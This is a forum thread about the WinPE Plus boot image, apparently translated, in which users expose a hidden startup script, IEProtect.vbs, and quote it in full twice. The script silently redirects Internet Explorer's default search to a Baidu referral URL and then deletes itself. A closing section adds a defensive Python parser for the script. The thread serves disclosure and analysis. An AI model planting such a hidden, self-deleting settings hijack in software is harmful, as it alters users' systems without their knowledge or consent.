Wuyou Boot Forum

Title: WinPE Plus's big problem

Author: tanjianwen    Posted: 2010-5-16 10:26
Title: WinPE Plus's big problem
Download from: http://bbs.wuyou.net/forum.php?mod=viewthread&tid=117016


Found a suspicious file in the system after using it:

%userprofile%\appdata\roaming\Micros~1\Windows\StartM~1\Programs\Startup\IEProtect.vbs
IEProtect.vbs

Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes"" /v DefaultScope /d {57441393-1EAF-4587-B23F-60B1E960833F} /f",vbhide
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes"" /v Version /t REG_DWORD /d 1 /f",vbhide
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v DisplayName /d baidu /f",vbhide
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v URL /d ""http://www.baidu.com/baidu?tn=winpe_pg&word={searchTerms}&ie=utf-8"" /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes"" /v DefaultScope /d {57441393-1EAF-4587-B23F-60B1E960833F} /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v DisplayName /d baidu /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v URL /d ""http://www.baidu.com/baidu?tn=winpe_pg&word={searchTerms}&ie=utf-8"" /f",vbhide
ws.run "cmd /c attrib -s -h -r -a ""%allusersprofile%\「开始」菜单\程序\启动\IEProtect.vbs""",vbhide
ws.run "cmd /c del ""%allusersprofile%\「开始」菜单\程序\启动\IEProtect.vbs"" /q",vbhide

[ Last edited by tanjianwen on 2010-5-16 03:30 ]
Author: lxl1638    Posted: 2010-5-16 11:10
Originally posted by tanjianwen on 2010-5-16 10:26
Download from: http://bbs.wuyou.net/forum.php?mod=viewthread&tid=117016


Found a suspicious file in the system after using it:

%userprofile%\appdata\roaming\Micros~1\Windows\StartM~1\Programs\Startup\IEProte ...


Found this online; it's someone else's account, and I don't know whether it's correct.


A very serious problem: after WinPE boots, it creates an IEProtect.vbs in "C:\Documents and Settings\All Users\「开始」菜单\程序\启动", and the next time you boot into your own Windows it runs automatically. Its contents are as follows:

Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes"" /v DefaultScope /d {57441393-1EAF-4587-B23F-60B1E960833F} /f",vbhide
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes"" /v Version /t REG_DWORD /d 1 /f",vbhide
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v DisplayName /d baidu /f",vbhide
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v URL /d ""http://www.baidu.com/baidu?tn=winpe_pg&word={searchTerms}&ie=utf-8"" /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes"" /v DefaultScope /d {57441393-1EAF-4587-B23F-60B1E960833F} /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v DisplayName /d baidu /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v URL /d ""http://www.baidu.com/baidu?tn=winpe_pg&word={searchTerms}&ie=utf-8"" /f",vbhide
ws.run "cmd /c attrib -s -h -r -a ""%allusersprofile%\「开始」菜单\程序\启动\IEProtect.vbs""",vbhide
ws.run "cmd /c del ""%allusersprofile%\「开始」菜单\程序\启动\IEProtect.vbs"" /q",vbhide

As you can see from this, once it autoruns at startup it modifies your registry and switches your default search engine to Baidu's; the whole process is completely hidden, and it deletes itself after running, so if you look in the "Startup" folder now you won't see the file.
But note the tn=winpe_pg inside "http://www.baidu.com/baidu?tn=winpe_pg&word={searchTerms}&ie=utf-8"; that is the key point. If you don't believe it, boot into WinPE, open C:\Documents and Settings\All Users\「开始」菜单\程序\启动 from within WinPE, and check whether the file is there.

[ Last edited by lxl1638 on 2010-5-16 11:12 ]
Author: xianglang    Posted: 2010-5-16 11:35
Haven't tried this PE. So making a PE can make money after all; people used to say there's no money in making PEs, but apparently that's wrong.
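As an added example (not from the thread or from the WinPE Plus package), the following Python takes the IEProtect.vbs lines quoted above as constructed sample input and reports what the script would do: which SearchScopes values it writes in which hives, the search URL carrying the tn=winpe_pg marker the reply points out, and whether it deletes its own file. The function names and regexes are mine; a defender can feed it any similar Startup-folder .vbs found on disk.

```python
import re

# Constructed copy of the IEProtect.vbs lines quoted in the thread (sample input,
# not a live file). VBScript writes a literal double quote inside a string as "".
IEPROTECT_VBS = r'''
Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes"" /v DefaultScope /d {57441393-1EAF-4587-B23F-60B1E960833F} /f",vbhide
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes"" /v Version /t REG_DWORD /d 1 /f",vbhide
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v URL /d ""http://www.baidu.com/baidu?tn=winpe_pg&word={searchTerms}&ie=utf-8"" /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes"" /v DefaultScope /d {57441393-1EAF-4587-B23F-60B1E960833F} /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v URL /d ""http://www.baidu.com/baidu?tn=winpe_pg&word={searchTerms}&ie=utf-8"" /f",vbhide
ws.run "cmd /c attrib -s -h -r -a ""%allusersprofile%\「开始」菜单\程序\启动\IEProtect.vbs""",vbhide
ws.run "cmd /c del ""%allusersprofile%\「开始」菜单\程序\启动\IEProtect.vbs"" /q",vbhide
'''

RUN_RE = re.compile(r'^\s*ws\.run\s+"(.*)"\s*,\s*vbhide\s*$', re.IGNORECASE)
REG_RE = re.compile(r'reg add "([^"]+)"'
                    r'(?:\s+/v\s+(\S+))?(?:\s+/t\s+(\S+))?'
                    r'(?:\s+/d\s+("[^"]*"|\S+))?', re.IGNORECASE)

def shell_commands(vbs_text):
    """Commands the script hands to cmd.exe, with VBScript "" quoting undone."""
    return [m.group(1).replace('""', '"')
            for m in map(RUN_RE.match, vbs_text.splitlines()) if m]

def reg_adds(cmds):
    """Each 'reg add' as (key, value_name, type, data); type defaults to REG_SZ."""
    out = []
    for c in cmds:
        m = REG_RE.search(c)
        if m:
            key, name, typ, data = m.groups()
            out.append((key, name, typ or 'REG_SZ', (data or '').strip('"')))
    return out

def hijacked_search_urls(adds, marker='tn=winpe_pg'):
    """Search-provider URLs written under SearchScopes that carry the referral marker."""
    return sorted({d for k, n, _, d in adds
                   if 'SearchScopes' in k and n == 'URL' and marker in d})

def default_scope_hives(adds):
    """Hives (HKCU/HKLM) in which the script forces DefaultScope."""
    return sorted({k.split('\\')[0] for k, n, _, _ in adds if n == 'DefaultScope'})

def deletes_itself(cmds, script='IEProtect.vbs'):
    """True when a 'del' command targets the script's own file (why Startup looks empty)."""
    return any(c.lower().startswith('cmd /c del ') and script.lower() in c.lower()
               for c in cmds)
```

Cleanup then means removing the file from both Startup folders and resetting the DefaultScope values in HKCU and HKLM that the parser lists.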